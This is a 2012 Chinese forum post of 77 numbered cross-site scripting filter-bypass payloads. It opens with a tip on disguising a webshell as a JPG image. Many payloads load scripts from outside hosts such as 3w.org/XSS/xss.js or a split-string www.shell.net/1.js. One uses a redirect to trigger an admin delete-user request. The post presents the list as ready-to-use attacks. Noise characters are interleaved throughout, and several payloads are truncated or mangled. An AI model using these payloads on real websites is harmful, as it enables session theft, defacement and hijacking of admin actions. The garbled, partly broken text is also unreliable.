跨站图片shell
2 t' y4 T# l; w; Q4 |/ w: A" IXSS跨站代码 <script>alert("")</script>
5 M, e1 w# @& v, U; @# S$ z. @% B1 a9 U% Q' o9 q" C+ p
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
1 {' [) m7 A9 q
% v. d: n8 j; c% A3 J
! [4 s. |; @! y+ o- c1 }1 v' u) ^* B3 D8 E
1)普通的XSS JavaScript注入
6 y" R" A" _# X& N4 o9 g<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ @, Q& o% H" t4 j; p: s
M) d, G) U8 h+ Z. o(2)IMG标签XSS使用JavaScript命令' H. ]" K8 ^" U" T
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- b4 ]% l( ~* c0 v( l/ j: _$ G2 _, S
(3)IMG标签无分号无引号
1 S: A& l/ m+ E# Z' i: v5 a<IMG SRC=javascript:alert(‘XSS’)>! y; S$ P4 q0 ~. N: C& V
% C( M; a) N8 Y7 c4 R
(4)IMG标签大小写不敏感
# {0 E' h8 V+ D) a6 M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* x) e' S3 L3 }
. A' |* E6 m: K5 l4 w& I/ A(5)HTML编码(必须有分号)4 `3 r5 } k/ t# e( L6 t$ \0 e+ h
<IMG SRC=javascript:alert(“XSS”)> ^3 b |9 [' X
, D" q% H& ~7 q! ?5 i1 b$ u(6)修正缺陷IMG标签
+ a' n( O6 b# C3 r D/ e1 C/ G<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> D" H! C( m1 R; D/ q# F, m
/ Z6 ?$ K" i1 T0 B1 M6 r6 D* T0 k
(7)formCharCode标签(计算器)
, b1 z1 ^! |' g) g<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>2 @+ l- @% S' _/ J ^( g+ J
: ^5 B0 e; ]; v' Y(8)UTF-8的Unicode编码(计算器)
# Z- T. l: r' Q) N* s<IMG SRC=jav..省略..S')>! R- L; i) ` z
- D9 H; [3 i7 B7 f
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ Q5 E1 K9 o8 x. {7 F<IMG SRC=jav..省略..S')>4 H: G5 n ?0 U7 U8 L/ f
2 `: k% O/ j5 L7 D0 C3 Y
(10)十六进制编码也是没有分号(计算器)
* u! B" g: k5 a: |; Z, a) L<IMG SRC=java..省略..XSS')>
" F# C+ m8 ?( U' I6 S0 L" I% i) }" i ^+ {) {
(11)嵌入式标签,将Javascript分开
1 {; A& t9 F4 F<IMG SRC=”jav ascript:alert(‘XSS’);”>* p7 @) m$ ^7 M* Y; T
% u \7 g4 e5 }5 ]' i
(12)嵌入式编码标签,将Javascript分开
9 u d) \" q7 _ X- w<IMG SRC=”jav ascript:alert(‘XSS’);”>7 l) P: j' V' O$ l5 b$ l/ w
) o. S; p0 V8 r- ?7 @(13)嵌入式换行符3 _* S& _2 i& c- B2 x6 n( Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" y& ~& k: y7 j
) y1 g! W- Q, d0 U/ @0 d8 U, H: V(14)嵌入式回车; w/ y7 X' q2 I) H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' ?, z; N& S* v' ]0 C
- c* ^3 [& m$ W& R7 s+ F8 @! M! Y(15)嵌入式多行注入JavaScript,这是XSS极端的例子! T! I# D3 _2 n* ?
<IMG SRC=”javascript:alert(‘XSS‘)”>9 S# g ]6 w9 q- s- I" V
" ]; u" x" }8 q* k/ ~* M3 }(16)解决限制字符(要求同页面)
2 {+ o, e8 _. S0 x( z: M0 v<script>z=’document.’</script>
7 f1 F5 q% D+ t0 R2 i$ y<script>z=z+’write(“‘</script>
# V }% Y. t8 y. y+ G, m<script>z=z+’<script’</script>
- @1 [+ V8 v5 c<script>z=z+’ src=ht’</script>7 a% [; V6 |6 e& N; ^8 [
<script>z=z+’tp://ww’</script>
! M3 ~ Z# t# @5 u, j2 I/ L<script>z=z+’w.shell’</script>
4 x2 ?. a N! y ]7 ?9 n8 D1 E i<script>z=z+’.net/1.’</script>
7 i2 N2 _1 x& E- a, f* J<script>z=z+’js></sc’</script>' L- V! u/ L( f! \% [# i
<script>z=z+’ript>”)’</script>
0 }! q' S( G5 v* t/ L% I+ k<script>eval_r(z)</script>- v8 N% f3 B5 w. |
# p. u! W) E' `* L8 w! a
(17)空字符
- h( P6 }5 K! B6 bperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 m( ~2 `/ b( x8 O2 s3 x9 o
( T0 i+ Y5 e1 F/ B; t3 s
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
3 m$ a3 O- q, j% operl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# ] R& L7 z: ^: b6 g- y
/ V; g9 J% `( P1 i2 }(19)Spaces和meta前的IMG标签5 }/ q* H' W( q% v1 L
<IMG SRC=” javascript:alert(‘XSS’);”>5 c' H& l" H! |: V, H( Y
9 ^8 j" ~/ t5 O0 |8 q
(20)Non-alpha-non-digit XSS
) W( I3 c' c& r8 C<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: r( J9 F- U: T- p6 {2 ]* l9 y, T2 |$ I+ f, A8 R
(21)Non-alpha-non-digit XSS to 2' b: |% |7 a3 [0 J9 n
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ H k. m7 d9 K' \0 L# U
s* a9 A' j* S9 v! w, F( H& [# H9 L# ]
(22)Non-alpha-non-digit XSS to 39 Z% s# L8 L/ v4 n, \* I+ m
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 X+ g# |8 `4 e' a$ D
4 w, }$ w$ C' t* Q(23)双开括号: y7 H5 v/ J6 E, s2 e' B
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* m" b7 |6 e8 H' h
. N: w* _4 x5 m/ X8 K! R0 e" x
(24)无结束脚本标记(仅火狐等浏览器)
m. ]1 ]* I3 b7 X( b<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; a2 J9 a& k3 u
, @1 g T y, T4 G& ]4 B0 ?5 w' r
(25)无结束脚本标记2" w) T% x, C4 ]
<SCRIPT SRC=//3w.org/XSS/xss.js>
1 p: x C$ d* U
" x) H* G, A' Z# Q# {7 }$ S; Z: o2 y(26)半开的HTML/JavaScript XSS
9 }5 N, E% F8 `. v7 y/ h, [. p2 f<IMG SRC=”javascript:alert(‘XSS’)”
1 t# M' U9 }6 q5 w, A. [
0 Z" o% y+ P) Q1 c6 F& O(27)双开角括号
6 O& ?3 v2 B' m& N<iframe src=http://3w.org/XSS.html <" B7 ]8 U4 W' Z8 g b* k
8 r/ B) ]2 ~" a$ W4 R! D(28)无单引号 双引号 分号
5 d0 |+ h" `# O4 C4 }0 b<SCRIPT>a=/XSS/
4 }- r8 c9 x$ o" Y! g7 t. b0 aalert(a.source)</SCRIPT>
, b8 W$ R! y6 Q6 g5 o
" s0 _6 b1 q L$ d- J(29)换码过滤的JavaScript' M/ j" Y4 U) n: }5 ~2 A
\”;alert(‘XSS’);//4 o8 d* E7 P! |. Y8 f. {5 F
5 h Y) H: f% i+ m" v2 e(30)结束Title标签
3 v2 q5 m ]% I8 a3 m</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
5 D( p' r4 `. k9 l' Z. }5 Q" |/ J7 a: j5 ~
(31)Input Image9 j6 d9 @1 }& m# b6 B/ J) ~% \
<INPUT SRC=”javascript:alert(‘XSS’);”>
3 d- G5 u5 [: v1 E5 g+ f ?" F+ n9 y4 y- u; p
(32)BODY Image; E5 J# y% x! p5 M
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>& u4 W8 a2 a6 d' y" s: y, ]6 o( E h
, f0 J6 K7 ~6 c. l
(33)BODY标签 S5 W% T' `7 g9 q0 e
<BODY(‘XSS’)>) S8 h1 G" S4 c2 N, a& f
1 f! T' m8 A1 M6 ]
(34)IMG Dynsrc+ f1 b& R, U7 X" x2 ^: Z1 M
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 g1 v6 z+ B/ t" M# {0 S3 Z
/ z" Y$ q, X# W9 @3 e(35)IMG Lowsrc
/ f0 w7 n$ j8 Q) Z<IMG LOWSRC=”javascript:alert(‘XSS’)”>, x! j/ g3 ~2 Q* p( K
6 D' c% t2 G3 Z$ e, N) J(36)BGSOUND, I2 j- s: h" R" @, R6 [+ o8 b' B
<BGSOUND SRC=”javascript:alert(‘XSS’);”>% ^& _+ A. v4 L; n" [& n. R6 |8 h3 a
. D/ |7 I' E( o' l5 V(37)STYLE sheet
9 d9 n8 G6 J1 |: M9 Q# ~<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>/ `* W1 I; p/ T+ t/ r
) c0 ^9 p2 \0 l# o(38)远程样式表
* z* ^; i# u7 [/ f9 v9 o<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! p# L& g; j) E& b, N# ]7 S) ]
& L O# T9 M$ r! J) v) ^(39)List-style-image(列表式)& l$ \% I" w+ a( X" z! A
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& d5 `+ Q* ?; o* B. Z$ ?$ B0 W6 I! }- H0 {( o# v, }) [2 V
(40)IMG VBscript2 {1 ~ E6 }1 Q, q2 i9 a
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
8 s( B0 f: [3 F. L s. I3 C; w/ `% W8 T; W# y3 H: P0 a5 V
(41)META链接url2 k- L% |1 ^# @3 K0 `) k
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
3 j% o6 u4 y [# T# K+ N( | d2 z6 Q. K" Z/ K- s
(42)Iframe! \( ~) z! `. g! I: U6 r
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
% o* j. i- z8 z+ C/ b J; q# B(43)Frame
* R K& v& l+ U" ?1 M4 P) Y' x' t9 k<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
6 W4 E- `9 n( o$ H$ q0 e3 w' z: T' r3 d
(44)Table/ I: m$ c. ]/ P) \( U l, o
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 Y7 d; Z& P. k3 d# ^' ~ W
6 ]" B- n/ \- W; h(45)TD
8 s) w+ M9 ~. G9 o" h8 g$ v<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 {" d- c( H$ e1 o+ `' o3 r, [# E4 B" S
(46)DIV background-image5 ], S' u! Q$ {% P5 n
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* o$ V; R( i! J, b
! U% p5 b7 g( W(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 } S& L8 Y5 `* R! h( f<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
( ~- q' X+ m+ l. f3 ]' l0 h0 N" U; B9 D; f" M) Q* b$ f
(48)DIV expression8 Y# J( R/ e$ R/ w! \2 R c' D# R
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# _/ B( Y& F; G+ c+ d Q! \: u( i: o8 |# j% O+ c3 v
(49)STYLE属性分拆表达! F! L1 |& o+ j8 O- K% g
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>; w9 r+ t- k+ p
+ u/ O, B( { w; ^, G! O/ ?
(50)匿名STYLE(组成:开角号和一个字母开头)
2 X' w% X& P. W j<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" J4 {% q( r+ g4 U2 J
+ }4 \# S) L3 Q' p4 z: h- O(51)STYLE background-image- N' q7 `7 ^# l* E1 h1 N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>. A/ h/ F( j F0 B9 G, a
1 J6 E/ |) A Z8 v1 |
(52)IMG STYLE方式
! z* h* u( B5 }4 Q, k; texppression(alert(“XSS”))’>- w9 \6 y, d$ x U2 F$ N3 B- \
/ p0 Q9 S! s* q1 u
(53)STYLE background
4 e. w8 X% K4 A' S0 A/ _% T<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: @3 ^. f: F& ?% [9 `
1 X+ m; P/ [* [- ]
(54)BASE
$ i' c! L$ A2 k# q) V' d8 y' d<BASE HREF=”javascript:alert(‘XSS’);//”>
$ u8 t8 s, k0 Z) Q* o
8 L/ c% M* c7 c2 X+ }+ I/ ^/ k6 B* f7 ~(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS M/ |$ S- ~3 Q& ^! ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>0 @ Z& q; |' {( u7 S8 @( Z
! h/ a- b( a j5 D% t1 M& u
(56)在flash中使用ActionScrpt可以混进你XSS的代码6 S. R* I! y. ?$ P3 U
a=”get”;
. e( h- S8 o1 _ l, e6 r$ gb=”URL(\”";$ ?5 ^ Q- R [, n, z
c=”javascript:”;
+ p& i# d- \& l% R9 ^d=”alert(‘XSS’);\”)”;
7 {; R0 {3 T' B# Peval_r(a+b+c+d);
6 G/ `. m. {" q3 l( ?9 \& R0 l, V8 e4 R* t3 ~' g1 _
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
$ b a2 ^. E/ W8 J<HTML xmlns:xss>
* v* e" r" O! C# p6 L<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
2 Y4 v% u5 d- m7 U& a7 l+ Q, `8 @<xss:xss>XSS</xss:xss>
, X! r& R' s: ~) _</HTML>. b2 U" X& v0 T4 Y3 n
) [6 b* J8 O M
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用: l+ q2 ]2 s- v5 r7 i( @* M! `, N
<SCRIPT SRC=””></SCRIPT>
/ Z# v$ Y7 e: L7 d0 t& L2 Y6 @
- d( @$ j9 n9 \(59)IMG嵌入式命令,可执行任意命令0 N1 ~: A* b9 b( t6 S0 I. b4 q, u5 i
<IMG SRC=”http://www.XXX.com/a.php?a=b”>' _2 U8 I8 w3 C9 p' I
! K$ b5 p1 d3 I/ l ~/ K: ?
(60)IMG嵌入式命令(a.jpg在同服务器)
# D/ }9 ~9 {& I$ D/ X& k8 uRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser3 g; J4 _7 \) i0 c9 O1 K
4 G: z1 \ |; c: C' R
(61)绕符号过滤
2 l" c4 }) p! P9 D: h) U<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
T* P* B% I: A( `; r8 E/ T) h% l8 \2 g- Z( ~
(62)1 u; F% T* O! s4 E2 k! @' A, s5 @
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% b. v0 i2 \/ N; `% I8 c. R3 n/ H8 T2 A8 q3 t
(63)
e k5 m5 O+ I<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>' o8 }0 j8 Q* s4 C/ k9 p$ A$ p
# U0 d3 d. ]2 T7 k3 W# H(64)2 H6 m9 O% U3 `+ H
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
. O) x! i) R6 ^2 B, U* Y7 L' y' h% n/ ]( P) K* k
(65)
) ]' y6 t% m( O<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 H: A9 e8 }6 T* `/ I) X" o
$ O) S* R B. j& [; ^. ]6 W(66)
( M( p$ q1 L% v. U<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>! u6 J, M8 ~2 L) V* P
5 W9 l6 `) V) `5 {5 f(67)
9 [ _( x. ]5 H8 g( `<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
+ Q4 e0 A# q2 V s _, g7 z
6 J% ^: S( A- J: y$ U- f8 s1 d(68)URL绕行
" N% w. U, A- [; {" k0 n8 a$ @* s<A HREF=”http://127.0.0.1/”>XSS</A>8 I, _7 C' E# b1 g
j% L% y( K) f3 d0 r) e0 v
(69)URL编码5 G0 r( a2 H5 \( T5 }
<A HREF=”http://3w.org”>XSS</A>- b6 Z; {5 J+ S$ g
& W# j* m6 P; m K
(70)IP十进制
( ]0 Q$ `! G A& k5 _7 J<A HREF=”http://3232235521″>XSS</A>
, @. Z6 y7 Y$ w/ J
8 F! k( J8 s* l2 |(71)IP十六进制
( {/ e7 V) e, r, g<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>$ V# `! a2 ?/ j( ]
/ t/ z) _1 \. t7 s9 N(72)IP八进制( _ ^3 T/ S5 C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
3 ~9 o! ~9 j/ O2 U
& `7 H0 M6 q& E(73)混合编码
' ], N" M8 J" `0 F& t<A HREF=”h
" i& A+ \( X4 s" O, P/ W# ktt p://6 6.000146.0×7.147/”">XSS</A>
$ S. W3 {1 u4 F5 V9 S9 |8 ]1 }6 P }+ R+ Q
(74)节省[http:]
- l# Z) a" K6 X<A HREF=”//www.google.com/”>XSS</A>9 V% e! O. C( R3 W+ f9 s/ J; T) M
3 V/ e& h" d$ }2 Y: W
(75)节省[www]; {; S; ?" u, F. i& y
<A HREF=”http://google.com/”>XSS</A>6 \9 G |2 n. X2 m+ A h, r- E+ U
2 f7 C6 V" t9 X4 o2 K1 V! l
(76)绝对点绝对DNS& c3 S/ l4 S) J) v! w, t
<A HREF=”http://www.google.com./”>XSS</A>! ~ v& d9 M* x1 R# Y% {& u0 G
$ H$ I, J% t$ j2 b( O- i( s
(77)javascript链接
( E6 a/ {2 k- y# y<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
6 R- o B5 n9 M |
发表于 2012-9-13 17:04:56
收藏
支持
反对